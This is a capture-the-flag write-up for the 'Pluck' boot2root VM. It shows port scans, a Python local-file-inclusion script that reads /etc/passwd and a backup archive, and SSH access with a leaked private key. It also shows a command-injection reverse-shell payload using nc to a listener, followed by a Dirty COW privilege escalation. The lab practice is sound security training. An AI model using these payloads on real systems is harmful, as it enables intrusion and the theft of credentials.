Introduction
« Pluck » is a new « boot2root » VM-style. You just need to launch the VM and .. get root ! Note that you can find this VM on Vulnhub.
Discovery
Scan all the ports !
$ sudo nmap -p- 192.168.56.101
Starting Nmap 7.01 ( https://nmap.org ) at 2017-03-20 14:14 CET
Nmap scan report for 192.168.56.101
Host is up (0.00056s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
5355/tcp open unknown
MAC Address: 08:00:27:45:29:54 (Oracle VirtualBox virtual NIC)
$ sudo nmap -p22,80,3306,5355 192.168.56.101 -A
Starting Nmap 7.01 ( https://nmap.org ) at 2017-03-20 14:14 CET
Nmap scan report for 192.168.56.101
Host is up (0.00018s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e8:87:ba:3e:d7:43:23:bf:4a:6b:9d:ae:63:14:ea:71 (RSA)
|_ 256 8f:8c:ac:8d:e8:cc:f9:0e:89:f7:5d:a0:6c:28:56:fd (ECDSA)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Pluck
3306/tcp open mysql MySQL (unauthorized)
5355/tcp open unknown
MAC Address: 08:00:27:45:29:54 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.0
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.18 ms 192.168.56.101
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 120.55 seconds
Gaining access
Let’s have a look at the HTTP service.


Oh, "?page=about.php" ? Why not trying a local file inclusion ? With something like.../etc/passwd ?

It works ! For mor visibility (and fun), we can exploit the LFI with a simple python script, that'll use the php wrappers "filter" to encode the output in base64 (output is decoded).
#!/usr/bin/python
# -*- coding: utf-8 -*-
import requests
import re,base64
url = "http://192.168.56.101/index.php?page=php://filter/read=convert.base64-encode/resource="
file_lfi = "/etc/passwd"
fullurl = url+file_lfi
req = requests.get(fullurl)
res = re.findall('<div class=jumbotron>(.*)</div><br>', req.text.encode('utf-8'))
output = base64.b64decode(res[0])
print output
# # Write command
# f = open('backup.tar','w')
# f.write(output)
exploiting_lfi
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:109::/var/run/dbus:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
lxd:x:108:65534::/var/lib/lxd/:/bin/false
uuidd:x:109:114::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:112:1::/var/cache/pollinate:/bin/false
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
Debian-exim:x:113:119::/var/spool/exim4:/bin/false
peter:x:1001:1001:,,,:/home/peter:/bin/bash
paul:x:1002:1002:,,,:/home/paul:/usr/bin/pdmenu
backup-user:x:1003:1003:Just to make backups easier,,,:/backups:/usr/local/scripts/backup.sh
/etc/passwd output
We can see something unusual at the end of the file : "backups easier,,,:/backups:/usr/local/scripts/backup.sh". To get the content of the file, just modify the "file_lfi" variable in the script :
#!/bin/bash
########################
# Server Backup script #
########################
#Backup directories in /backups so we can get it via tftp
echo "Backing up data"
tar -cf /backups/backup.tar /home /var/www/html > /dev/null 2& > /dev/null
echo "Backup complete"
Two directories (/home and /var/www/html) are backing up in the file /backups/backup.tar. Let's grab it (uncomment the last lines in the python script to write it where you want).
$ file backup.tar
backup.tar: POSIX tar archive (GNU)
$ tar tvf backup.tar
drwxr-xr-x root/root 0 2017-01-18 09:27 home/
drwxr-xr-x bob/bob 0 2017-01-18 13:43 home/bob/
-rw-r--r-- bob/bob 3771 2017-01-18 06:39 home/bob/.bashrc
-rw-r--r-- bob/bob 0 2017-01-18 09:40 home/bob/.sudo_as_admin_successful
-rw-r--r-- bob/bob 655 2017-01-18 06:39 home/bob/.profile
-rw-r--r-- bob/bob 220 2017-01-18 06:39 home/bob/.bash_logout
drwxr-xr-x paul/paul 0 2017-01-18 19:13 home/paul/
drwxrwxr-x paul/paul 0 2017-01-18 19:09 home/paul/keys/
-rwxrwxr-x paul/paul 600 2017-01-18 19:08 home/paul/keys/id_key3.pub
-rwxrwxr-x paul/paul 600 2017-01-18 19:08 home/paul/keys/id_key2.pub
-rwxrwxr-x paul/paul 672 2017-01-18 19:08 home/paul/keys/id_key2
-rwxrwxr-x paul/paul 392 2017-01-18 19:09 home/paul/keys/id_key4.pub
-rwxrwxr-x paul/paul 600 2017-01-18 19:08 home/paul/keys/id_key5.pub
-rwxrwxr-x paul/paul 1675 2017-01-18 19:09 home/paul/keys/id_key6
-rwxrwxr-x paul/paul 668 2017-01-18 19:08 home/paul/keys/id_key1
-rwxrwxr-x paul/paul 668 2017-01-18 19:08 home/paul/keys/id_key5
-rwxrwxr-x paul/paul 600 2017-01-18 19:08 home/paul/keys/id_key1.pub
-rwxrwxr-x paul/paul 392 2017-01-18 19:09 home/paul/keys/id_key6.pub
-rwxrwxr-x paul/paul 1679 2017-01-18 19:09 home/paul/keys/id_key4
-rwxrwxr-x paul/paul 668 2017-01-18 19:08 home/paul/keys/id_key3
-rw-r--r-- paul/paul 3771 2017-01-18 09:04 home/paul/.bashrc
-rw-r--r-- paul/paul 655 2017-01-18 09:04 home/paul/.profile
-rw-r--r-- paul/paul 220 2017-01-18 09:04 home/paul/.bash_logout
drwxr-xr-x peter/peter 0 2017-01-18 09:04 home/peter/
-rw-r--r-- peter/peter 3771 2017-01-18 09:04 home/peter/.bashrc
-rw-r--r-- peter/peter 655 2017-01-18 09:04 home/peter/.profile
-rw-r--r-- peter/peter 220 2017-01-18 09:04 home/peter/.bash_logout
drwxr-xr-x root/root 0 2017-01-18 19:28 var/www/html/
drwxr-xr-x root/root 0 2016-07-25 15:53 var/www/html/fonts/
-rw-r--r-- root/root 108738 2016-07-25 13:43 var/www/html/fonts/glyphicons-halflings-regular.svg
-rw-r--r-- root/root 18028 2016-07-25 13:43 var/www/html/fonts/glyphicons-halflings-regular.woff2
-rw-r--r-- root/root 45404 2016-07-25 13:43 var/www/html/fonts/glyphicons-halflings-regular.ttf
-rw-r--r-- root/root 23424 2016-07-25 13:43 var/www/html/fonts/glyphicons-halflings-regular.woff
-rw-r--r-- root/root 20127 2016-07-25 13:43 var/www/html/fonts/glyphicons-halflings-regular.eot
-rw-r--r-- root/root 589 2017-01-18 18:16 var/www/html/about.php
-rw-r--r-- root/root 1427 2017-01-18 19:28 var/www/html/index.php
-rw-r--r-- root/root 241 2017-01-18 16:10 var/www/html/footer.php
drwxr-xr-x root/root 0 2016-07-25 15:53 var/www/html/css/
-rw-r--r-- root/root 389287 2016-07-25 15:53 var/www/html/css/bootstrap.css.map
-rw-r--r-- root/root 542194 2016-07-25 15:53 var/www/html/css/bootstrap.min.css.map
-rw-r--r-- root/root 26132 2016-07-25 15:53 var/www/html/css/bootstrap-theme.css
-rw-r--r-- root/root 23409 2016-07-25 15:53 var/www/html/css/bootstrap-theme.min.css
-rw-r--r-- root/root 121200 2016-07-25 15:53 var/www/html/css/bootstrap.min.css
-rw-r--r-- root/root 25648 2016-07-25 15:53 var/www/html/css/bootstrap-theme.min.css.map
-rw-r--r-- root/root 47706 2016-07-25 15:53 var/www/html/css/bootstrap-theme.css.map
-rw-r--r-- root/root 146010 2016-07-25 15:53 var/www/html/css/bootstrap.css
-rw-r--r-- root/root 1492 2017-01-18 17:09 var/www/html/header.php
-rw-r--r-- root/root 1486 2017-01-18 18:24 var/www/html/admin.php
drwxr-xr-x root/root 0 2017-01-18 16:08 var/www/html/js/
-rw-r--r-- root/root 97163 2016-12-20 19:17 var/www/html/js/jquery.min.js
-rw-r--r-- root/root 69707 2016-07-25 15:53 var/www/html/js/bootstrap.js
-rw-r--r-- root/root 484 2016-07-25 15:53 var/www/html/js/npm.js
-rw-r--r-- root/root 37045 2016-07-25 15:53 var/www/html/js/bootstrap.min.js
Wow, many id_key ! And a SSH Server is up 🙂 Trying all the key, only the id_key4 seems to work !
$ ssh paul@192.168.56.101 -i id_key4
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0755 for 'id_key4' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_key4": bad permissions
paul@192.168.56.101's password:
ssh_key_failed_permissions
Oops, bad perms ! Fix it !
W00t ! Connected .... but stuck in a pdmenu :/

Escape PDMENU / Reverse shell access
With this menu, we can list/browse directory, modify files (if we have permissions, of course), navigate with lynx, ping or etablish a telnet connexion. Every time I see a prompt that allow a ping command, I think "Command Injection" :-). Here we go :


Reverse shell time ! Set up a listener on port 8081, and inject the following payload :
1;`mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.1 8081 >/tmp/f`
reverse-shell-payload

Gaining root access / Privilege escalation
How to get root ? What's the kernel ? What's the OS ?
$ uname -a
Linux pluck 4.8.0-22-generic #24-Ubuntu SMP Sat Oct 8 09:15:00 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
$ cat /etc/*release*
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.10
DISTRIB_CODENAME=yakkety
DISTRIB_DESCRIPTION="Ubuntu 16.10"
NAME="Ubuntu"
VERSION="16.10 (Yakkety Yak)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.10"
VERSION_ID="16.10"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="http://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=yakkety
UBUNTU_CODENAME=yakkety
Information Gathering - Kernel/OS
What about Dirtyc0w ?
Patched Kernel Versions
Ubuntu
4.8.0-26.28 for Ubuntu 16.10
4.4.0-45.66 for Ubuntu 16.04 LTS
3.13.0-100.147 for Ubuntu 14.04 LTS
3.2.0-113.155 for Ubuntu 12.04 LTS
Pluck seems to be vulnerable ! Exploit !

Got root 😉